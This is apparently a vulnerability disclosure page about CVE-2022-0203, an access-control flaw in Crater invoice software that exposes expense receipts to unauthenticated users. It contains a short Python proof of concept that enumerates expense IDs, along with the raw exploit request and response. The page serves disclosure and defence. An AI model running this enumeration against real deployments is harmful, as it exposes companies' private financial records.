Lucene search
Theworstcomrade395FC553-2B90-4E69-BA07-A316E1C06406HistoryDec 29, 2021 - 7:43 p.m.
Improper Access Control in crater-invoice/crater
2021-12-2919:43:19
theworstcomrade
www.huntr.dev
8
crater-invoice
access control
exploitable vulnerability
receipts
unauthorized access
EPSS
0.001
Percentile
35.0%
Description
In recent Crater version (faf1ef09 tag: 5.0.6) I discovered, that not authenticated user can download all expense receipts uploaded to any company.
Proof of Concept
import requests
for i in range(1, 100):
r = requests.get(f'http://172.17.0.1:8080/expenses/{i}/download-receipt')
if r.status_code == 200:
print(f'Downloaded receipt for expense No.{i}')
Vulnerable request:
GET /expenses/2/download-receipt HTTP/1.1
Host: 172.17.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Response:
HTTP/1.1 200 OK
Host: 172.17.0.1:8080
Date: Wed, 29 Dec 2021 19:26:07 GMT
Connection: close
X-Powered-By: PHP/8.0.14
Cache-Control: public
Date: Wed, 29 Dec 2021 19:26:07 GMT
Last-Modified: Wed, 29 Dec 2021 19:15:13 GMT
Content-Disposition: attachment; filename=Sample.pdf
Content-Type: application/pdf
Content-Length: 65695
Accept-Ranges: bytes
Set-Cookie: XSRF-TOKEN=eyJpdiI6InNZRUpvRFo0T0cxNHVmdkxvZEFDRlE9PSIsInZhbHVlIjoia1dGYld4MUdNVFVEOGNTa0NDQkZvNTdCU093WUhTbVhkWkhLMDRRYTZXUHJVYjNIZ0pxSGF2dHp4ZDFpYjZKSDAvWFVEVmJDRDBWR3hVNHJZSDdvYk1PeTZhdGlMcmxLcUNBUkhweW80V2V4VHhJWlhRVDVkWll3VDBaZ3VmbWQiLCJtYWMiOiJlNGQ4NjBmMjdlNDJkZTk2NTk0NzZjODgwZTllZDZlM2M1MmE1Zjc5NjZkYjgyZjJiNTE4ZDUyOWM5MGZlYjE5IiwidGFnIjoiIn0%3D; expires=Thu, 30-Dec-2021 19:26:07 GMT; Max-Age=86400; path=/; domain=172.17.0.1; samesite=lax
Set-Cookie: laravel_session=eyJpdiI6InV1aTZPVFlGZzNSNFFieHRnZVVzMVE9PSIsInZhbHVlIjoiNE5zMEZiNWlWVzBRRU5zdkljTi9acjFtT3lJNFpDeWJjSk9hZ1luRm9lSVgvVWc3OEJNcDhUcFJMMmNGQUVUbm9yd3FrY3dyOG5YQ0JPR1Zjamlpb1Zqd3VkUlM1YTU2bThLWEpGZDNIeHBpN3FlbDZMMEQ2M0xNZUpWd1F1QnQiLCJtYWMiOiIwN2M5NjI2YzZkY2UxNWEyOGY4M2VkM2U0ZDFkNDE3NWY4ZTVjZTY2NjhjZmMwZjM5ZmQ0NTA2MzEwNDYzNjY3IiwidGFnIjoiIn0%3D; expires=Thu, 30-Dec-2021 19:26:07 GMT; Max-Age=86400; path=/; domain=172.17.0.1; httponly; samesite=lax
Set-Cookie: 8XSG7KqTTKX6kx0xn1mEIE2dq4kSyWAoyIUaK8CF=eyJpdiI6IktHZDhvMUkzZG5nNndaNW9xM1hIZGc9PSIsInZhbHVlIjoiN1ZQaEhCekMwc1ZNTnRjbEVLamtqN0hSRHVSbFRJbnNpendEdis0RFNHM1B6NDdjZXl2WmhTMytOOUovTlNjaUo3UTZnbTlieS9GV0VaUk5CQjBmMTgrNEpwMFA1cUtybmVXQnl0QlN1bkxBZ0pSRDBad3JrSVA5VG5vV3I5WVlNWFVIWnFwTGxlYkdiZ1dyWmQ2Mmsxb0tvQW16dWE2K25hM0JvWnNSOFlyK1ZwWXNtM0o5VVVPbHdvNFlMbGFuVGJET01EY1A5TWVtbnJvaitKVHUvNEZNZ2JKbkhGVVBRakt5clBwenlsR0l1ei9zWTZLU25RenJ4aHdMaW1IWngvR091TTBZamRoQzU5OXlpZHVYMWJUNUpUV1oyaGNVclJHbElibHk1bDBFemU0QWR1RG9oNEtKTzdaVmF0ZHFsTnNsQmk5Y2J1eTR6S3VwRTJPLyt0NXFtOVE5ZlUrSWxQZWdRWWp3bGlNTzdVT2NvRHNiODcvMGlLbHJvQUwyZXpQOWJKTnpycDJoTkNCa2JNVzNNdz09IiwibWFjIjoiZDczM2UzMjdmNThiNjZlOTAyZTA5YjdiNGFjMmFjNGUxOTA4OWFmZDFiNzZhYjBjMzBlNDIxOGQxYWYxYTdmZSIsInRhZyI6IiJ9; expires=Thu, 30-Dec-2021 19:26:07 GMT; Max-Age=86400; path=/; domain=172.17.0.1; httponly; samesite=lax
%PDF-1.4
%äüöÃ
2 0 obj
<</Length 3 0 R/Filter/FlateDecode>>
stream
...
Impact
This vulnerability allows to download all receipts of expenses.
Related
cvelist
cvelist
CVE-2022-0203 Improper Access Control in crater-invoice/crater
2022-01-26 12:20:10
github
github
Missing Authorization in Crater Invoice
2022-01-27 00:01:17
cve
cve
CVE-2022-0203
2022-01-26 13:15:07
osv
osv
CVE-2022-0203
2022-01-26 13:15:07
Missing Authorization in Crater Invoice
2022-01-27 00:01:17
nvd
nvd
CVE-2022-0203
2022-01-26 13:15:07
veracode
veracode
Authentication Bypass
2022-01-27 08:38:54
prion
prion
Improper access control
2022-01-26 13:15:00